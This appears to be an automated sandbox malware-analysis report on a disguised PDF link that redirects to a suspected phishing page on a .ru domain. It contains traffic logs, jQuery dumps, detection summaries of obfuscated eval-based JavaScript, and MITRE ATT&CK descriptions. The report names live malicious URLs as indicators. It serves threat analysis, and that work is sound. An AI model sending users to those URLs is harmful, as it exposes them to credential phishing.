6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2025-03-25 01:09:28 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	104.21.112.1	443	1596	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 01:09:29 UTC	1329	OUT	GET /favicon.ico HTTP/1.1 Host: uz5k.vsmaemhjvk.ru Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://uz5k.vsmaemhjvk.ru/vHFigT/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6IlNHUVNQQjhHbXZubUdBZEI1U2g4SkE9PSIsInZhbHVlIjoiem4vT0xJRnFlcVd3UXJTM24yYlJvTUN4c0lxT0FXLzI4WTk1RVVzYVdPOG8zMUNieGJKYXBGZE1aRDZzd0VWcUlKSzlBdzUrbXFXbjNTaVlmTEFkY1NneTF5SWlib3UvK2NQbVdCSlhvUFlrcWViemJKZkhNL0xVTE9VQkF5OUwiLCJtYWMiOiIzMWMwMzE3N2Y0ZjcwNTg5N2JlYzM0MjgyOTk1OWVkMzNmYzljYmRlNDJlNDhlOWE2N2U1ZGUxODFiNzI3YTgzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlgyVENSRVZRUkgrNUxZekEvSWdWc1E9PSIsInZhbHVlIjoiUjZZcDVta3lRc0dwdTlwWmV6WXc4TnN5RGU2Rkg3bXNrS0FJS0pQUlZaVU1oV2VnWE11WUVpK0ZyaE8yL3g5WXdlZFA2MDhncG1pSkI3RmZaWGVRR0RESE40NVk1TGZSWFkwVVpOY1lDMXEyU0xPbDduVklCOUZDcGs2aUNSdGQiLCJtYWMiOiIwODk4OWFlOTkyODkwZTg1OTM2ZDZjMDJkYzdmMWVmMjZlODBiZGZiNDNlYjg4NDQ4MWJmODgxZjhiM2RkNzBhIiwidGFnIjoiIn0%3D
2025-03-25 01:09:29 UTC	1057	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Mar 2025 01:09:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7jsrRBHL7OOBKpq8LmN6XPHEZF3E%2BfRrsq%2B22P1okQFQDB%2Fxc2VPCdkwWwV3SJ5NhVy5SzVS8bVnLzAHX0jAk1mjkoOueiYg3Vv6vBiQpLbqjHP4bfdnrS%2B28igD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding server-timing: cfL4;desc="?proto=TCP&rtt=16286&min_rtt=16286&rtt_var=6107&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2233&delivery_rate=248311&cwnd=247&unsent_bytes=0&cid=e5f5288a47490870&ts=36&x=0" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Server: cloudflare CF-RAY: 925a85ea69b9b2c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=96913&min_rtt=96359&rtt_var=20866&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1901&delivery_rate=38638&cwnd=239&unsent_bytes=0&cid=66a3ceafd25be2f0&ts=332&x=0"
2025-03-25 01:09:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	35.190.80.1	443	1596	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 01:09:29 UTC	537	OUT	OPTIONS /report/v4?s=7jsrRBHL7OOBKpq8LmN6XPHEZF3E%2BfRrsq%2B22P1okQFQDB%2Fxc2VPCdkwWwV3SJ5NhVy5SzVS8bVnLzAHX0jAk1mjkoOueiYg3Vv6vBiQpLbqjHP4bfdnrS%2B28igD HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://uz5k.vsmaemhjvk.ru Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 01:09:30 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Tue, 25 Mar 2025 01:09:29 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	35.190.80.1	443	1596	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 01:09:30 UTC	512	OUT	POST /report/v4?s=7jsrRBHL7OOBKpq8LmN6XPHEZF3E%2BfRrsq%2B22P1okQFQDB%2Fxc2VPCdkwWwV3SJ5NhVy5SzVS8bVnLzAHX0jAk1mjkoOueiYg3Vv6vBiQpLbqjHP4bfdnrS%2B28igD HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 432 Content-Type: application/reports+json Origin: https://uz5k.vsmaemhjvk.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 01:09:30 UTC	432	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 34 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 75 7a 35 6b 2e 76 73 6d 61 65 6d 68 6a 76 6b 2e 72 75 2f 76 48 46 69 67 54 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 31 32 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 Data Ascii: [{"age":0,"body":{"elapsed_time":542,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://uz5k.vsmaemhjvk.ru/vHFigT/","sampling_fraction":1.0,"server_ip":"104.21.112.1","status_code":404,"type":"http.error"},"type":"network-error
2025-03-25 01:09:30 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Tue, 25 Mar 2025 01:09:29 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	1
Start time:	21:09:15
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	21:09:17
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2424,i,5229905219109430079,10851050355484582546,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2480 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	21:09:24
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sallybarmescounsellor.co.uk/pad4.pdf"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Source: 0.2..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://uz5k.vsmaemhjvk.ru/vHFigT/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` to decode base64-encoded strings, followed by `eval()` to execute the decoded content, poses a significant security risk. Additionally, the script appears to be sending user data to an untrusted domain, which is a clear indicator of malicious intent. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
Source: 0.4..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://uz5k.vsmaemhjvk.ru/vHFigT/... This script demonstrates high-risk behavior with the use of the `eval` function to execute dynamic code. The obfuscated string is decoded and then evaluated, which can lead to the execution of malicious code. Additionally, the script uses a `Proxy` object to intercept property access, further increasing the risk of unintended code execution. Overall, this script exhibits a high level of risk and should be thoroughly reviewed before execution.

Source: https://uz5k.vsmaemhjvk.ru/vHFigT/	HTTP Parser: No favicon
Source: https://uz5k.vsmaemhjvk.ru/vHFigT/	HTTP Parser: No favicon

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: Yara match	File source: 0.1.d.script.csv, type: HTML
Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: 0.1.pages.csv, type: HTML

Source: Yara match	File source: 0.5.d.script.csv, type: HTML
Source: Yara match	File source: 0.0.d.script.csv, type: HTML

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.65.195
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.201.4
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pad4.pdf HTTP/1.1Host: sallybarmescounsellor.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /vHFigT/ HTTP/1.1Host: uz5k.vsmaemhjvk.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://uz5k.vsmaemhjvk.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: uz5k.vsmaemhjvk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uz5k.vsmaemhjvk.ru/vHFigT/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlNHUVNQQjhHbXZubUdBZEI1U2g4SkE9PSIsInZhbHVlIjoiem4vT0xJRnFlcVd3UXJTM24yYlJvTUN4c0lxT0FXLzI4WTk1RVVzYVdPOG8zMUNieGJKYXBGZE1aRDZzd0VWcUlKSzlBdzUrbXFXbjNTaVlmTEFkY1NneTF5SWlib3UvK2NQbVdCSlhvUFlrcWViemJKZkhNL0xVTE9VQkF5OUwiLCJtYWMiOiIzMWMwMzE3N2Y0ZjcwNTg5N2JlYzM0MjgyOTk1OWVkMzNmYzljYmRlNDJlNDhlOWE2N2U1ZGUxODFiNzI3YTgzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlgyVENSRVZRUkgrNUxZekEvSWdWc1E9PSIsInZhbHVlIjoiUjZZcDVta3lRc0dwdTlwWmV6WXc4TnN5RGU2Rkg3bXNrS0FJS0pQUlZaVU1oV2VnWE11WUVpK0ZyaE8yL3g5WXdlZFA2MDhncG1pSkI3RmZaWGVRR0RESE40NVk1TGZSWFkwVVpOY1lDMXEyU0xPbDduVklCOUZDcGs2aUNSdGQiLCJtYWMiOiIwODk4OWFlOTkyODkwZTg1OTM2ZDZjMDJkYzdmMWVmMjZlODBiZGZiNDNlYjg4NDQ4MWJmODgxZjhiM2RkNzBhIiwidGFnIjoiIn0%3D

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: sallybarmescounsellor.co.uk
Source: global traffic	DNS traffic detected: DNS query: uz5k.vsmaemhjvk.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://sallybarmescounsellor.co.uk/pad4.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 3036, Parent PID: 3788

General

File Activities

File Opened

File Created

File Deleted

File Moved

Other File Operations

Registry Activities

Windows Analysis Report
https://sallybarmescounsellor.co.uk/pad4.pdf